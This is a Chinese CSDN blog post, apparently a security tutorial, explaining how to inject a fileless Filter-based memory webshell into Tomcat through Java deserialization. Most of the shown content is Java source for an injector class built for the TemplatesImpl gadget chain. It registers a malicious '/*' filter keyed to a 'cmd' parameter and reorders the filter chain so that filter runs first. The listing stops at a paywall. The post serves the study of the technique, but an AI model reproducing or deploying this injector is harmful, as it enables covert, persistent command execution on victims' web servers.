Java反序列化注入内存马

最新推荐文章于 2023-11-16 17:06:07 发布
最新推荐文章于 2023-11-16 17:06:07 发布
阅读量2.4k 收藏 3
点赞数 1
分类专栏: java安全 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122844491
版权

Java内存马总体有Servlet/Filter/Listern/Java-Agent四种,前三种思路都差不多,通过不同方式获取到ApplicationContext/servletContext/StandardContext等对象,然后往ApplicationContext/servletContext/StandardContext注入恶意的Servlet/Filter/Listern,这里通过注入 Filter实现内存马。

实现一

通过Thread.currentThread().getContextClassLoader().getResources().getContext().getServletContext()方法获取到ServletContext

通过ServletContext#addFilter添加Filter,ServletContext#addFilter调用的是ApplicationContext#addFilter方法。

image-20220208204301916

如果LifecycleStatestate属性值不等于LifecycleState.STARTING_PREP值则抛出错误,需要反射修改属性值,修改之后要重新修改回来否则服务器会崩,把传参进来的filter/filterName/filterClass放进filterDef/context里面然后封装进ApplicationFilterRegistration对象,看一下这个对象的构造方法就知道其实是封装进对象的属性中。

image-20220208204750455

通过addFilter方法把filterName/filterClass/filter等信息封装进了this.context.filterDefs中,也就是StandardContext.filterDefs中,还需要调用FilterRegistration#addMappingForUrlPatterns方法添加FilterMap,实际调用其实现类的方法即ApplicationFilterRegistration#addMappingForUrlPatterns

image-20220208211351707

StandardContext#filterStart方法遍历filterDefs把其加入到filterConfigs中,在前面addFilter方法中已经把需要添加的Filter封装进filterDefs中了,那么只需要调用StandardContext#filterStart方法即可真正的添加上Filter了。

image-20220208205906943

当然通过反射进行添加Filter也是可以的,比如前面分析Filter注册使用流程时用JSP写的马就是反射添加进去的。(https://blog.csdn.net/qq_53264525/article/details/122262189?spm=1001.2014.3001.5502

package com.Jasetol.Torjans;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.LifecycleState;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import javax.servlet.*;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.util.Map;

public class InjectTomcat01 extends AbstractTranslet implements Filter{
   

    private static String filterName = "k";
    private static String param = "cmd";
    private static String filterUrlPattern = "/*";
    static {
   
        try{
   
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
            ServletContext servletContext = standardContext.getServletContext();
            Field filterConfigs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
            filterConfigs.setAccessible(true);
            Map map = (Map) filterConfigs.get(standardContext);
            if (map.get(filterName) == null && standardContext != null){
   
                Field stateField = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");
                stateField.setAccessible(true);
                stateField.set(standardContext, LifecycleState.STARTING_PREP);
                FilterRegistration.Dynamic filter = servletContext.addFilter(filterName, new InjectTomcat01());
                filter.addMappingForUrlPatterns(java.util.EnumSet.of(DispatcherType.REQUEST),false,new String[]{
   filterUrlPattern});
                Method filterStart = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("filterStart");
                filterStart.invoke(standardContext,null);
                FilterMap[] filterMaps = standardContext.findFilterMaps();
                for (int i = 0 ; i < filterMaps.length ; i++){
   
                    if (filterMaps[i].getFilterName().equalsIgnoreCase(filterName)){
   
                        FilterMap filterMap = filterMaps[0];
                        filterMaps[0] = filterMaps[i];
                        filterMaps[i] = filterMap;
                    }
                }
                stateField.set(standardContext,LifecycleState.STARTED);
            }
        }catch (Exception e){
   }
    }


    @Override
    public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, SerializationHandler[] handlers) throws TransletException {
   

    }

    @Override
    public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
   

    }

    @Override
    public void init(FilterConfig filterConfig) throws
最低0.47元/天 解锁文章
0x6b79
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Servlet3.0 容器中自动加载Filter和Listener的方式
swarthy000
08-19 246
简述Servlet3.0 容器中自动加载Filter和Listener的方式是什么? Servlet 3.0规范的容器启动时,会查找ServletContainerInitializer接口的实现类,在Spring中,Spring提供的该接口实现类为SpringServletContainerInitializer, ...
Java安全』Tomcat内存_动态注册Filter内存
Ho1aAs‘s Blog
03-23 1582
文章目录前言Filter生命周期Filter类介绍Servlet启动流程Filter调用流程分析1. 从Standardcontext获取filterMaps2. 遍历filterMap匹配url并调用了addFilter方法添加到filterChain3. 依次调用doFilterFilter内存原理Ⅰ. 获取contextⅡ. 生成恶意Filter用FilterDef封装添加到FilterDefsⅢ. 用filterConfig封装filterDefs添加到filterConfigsⅣ. 生成filt
java tomcat内存学习
springgold的博客
01-21 747
1.tomcat 1.tomcat 结构 --Server 顶层容器--Service 提供具体服务的--Connector--Container--Engine--Host--Context--Wrapper--Service Server: 一个Tomcat仅有一个Server,指代整个Web服务器。Connect...
10.Filter过滤器
khmff的博客
08-12 167
(4)Filter执行流程(浏览器->Filter->服务器->Filter->浏览器)。理解:代理方法代替了原方法,代理方法里面可以调用原方法(只执行代理方法,不执行原方法)(6)Filter的拦截方式:注解和web.xml配置。(3)动态代理(与真实类实现相同的接口)(2)使用Filter实现的案例。(2.2)案例二、敏感词汇过滤。(1)Filter的基本使用。(2.1)案例一: 登录验证。(5)Filter的生命周期。一、Filter过滤器。
ServletContext和Filter
m0_73050509的博客
09-06 269
ServletContext的设置和值的调用,Filter的使用情景,全局编码格式过滤,身份认证拦截器
[Java安全]—Tomcat Filter内存
Sentiment的博客
07-17 3452
Servlet 有自己的过滤器filter,可以通过自定义的过滤器,来对用户的请求进行拦截等操作。经过 filter 之后才会到 Servlet ,那么如果我们动态创建一个 filter 并且将其放在最前面,我们的 filter 就会最先执行,当我们在 filter 中添加恶意代码,就会进行命令执行,这样也就成为了一个内存 Webshell,所以就需要我们想办法在最前方注册一个恶意的filter并执行。先看一个正常的demofilter.java 运行后成功触发之后再看几个会用到的类:接下来我们来分析一下
Javaweb安全——Tomcat 内存基础
weixin_43610673的博客
08-17 1381
无文件落地的 webshell 技术,即,通常配合反序列化或者spel表达式注入进行类加载写入。本文环境 Tomcat 9.0.59 作为中间件,且并没有配置spring框架,代码具体实现与中间件有关。
基于混合分析的Java反序列化利用链挖掘方法
05-14
反序列化利用链是攻击者成功利用此类漏洞的关键,它是一系列精心构造的类和方法调用序列,可以将恶意数据注入到程序中,最终执行攻击者的目标代码。 传统的反序列化漏洞分析方法主要依赖于人工,这需要大量时间和...
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存
03-11
shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
序列化与反序列化的参考demo
01-17
在编程领域,序列化与反序列化是两个关键的概念,主要用在数据持久化、网络传输和跨进程通信等场景。下面将详细讲解这两个概念及其相关的应用。 **序列化(Serialization)** 序列化是将对象的状态信息转换为可以...
S01-java反序列化基础知识总结1
08-03
了解Java反序列化的基础知识有助于深入理解类加载机制,特别是在安全性、自定义类加载和内存管理方面。下面我们将详细讨论Java的类加载过程以及如何利用自定义类加载器实现反序列化。 1. **类加载流程**: - 当...
Json序列化与反序列化
11-15
在编程中,我们经常需要将JSON对象转换为编程语言中的数据结构(如Java对象、C#类等),这个过程称为序列化;反之,将编程语言中的数据结构转换回JSON字符串则称为反序列化。 **一、Json序列化** 序列化是将数据...
TemplatesImpl利用链与Fastjson注入内存
weixin_42508548的博客
01-31 1024
TemplatesImpl利用链是一个非常重要的东西,要知道,CC链可以用它,CB链也用它,注入内存还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存呢,也是通过newInstance实现。
Yso-Java Hack 进阶:利用反序列化漏洞打内存
Karka_的博客
08-04 293
Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。
CC1反序列化
v2ish1yan的博客
11-02 335
这个类是TransformedMap(上面的那个)的父类在AbstractInputCheckedMapDecorator的MapEntry静态类中的setValue()调用了} }Java的entry是一个静态内部类,实现Map.Entry< K ,V> 这个接口,通过entry类可以构成一个单向链表。这个MapEntry类继承了AbstractMapEntryDecorator,而AbstractMapEntryDecorator又实现了Map.Entry接口。
[Java安全]—Tomcat反序列化注入回显内存
Sentiment的博客
12-03 1022
在之前学的tomcat filter、listener、servlet等内存中,其实并不算真正意义上的内存,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3182
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
深入研究Tomcat内存的攻击技术
最新发布
hackzkaq的博客
11-16 239
Tomcat内存Tomcat Memory Shell)是一种利用Apache Tomcat服务器的漏洞,将恶意代码注入Tomcat进程的内存中的攻击技术ServletContextListener:用于监听整个 Servlet 上下文(创建、销毁)ServletContextAttributeListener:对 Servlet 上下文属性进行监听(增删改属性)ServletRequestListener:对 Request 请求进行监听(创建、销毁)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值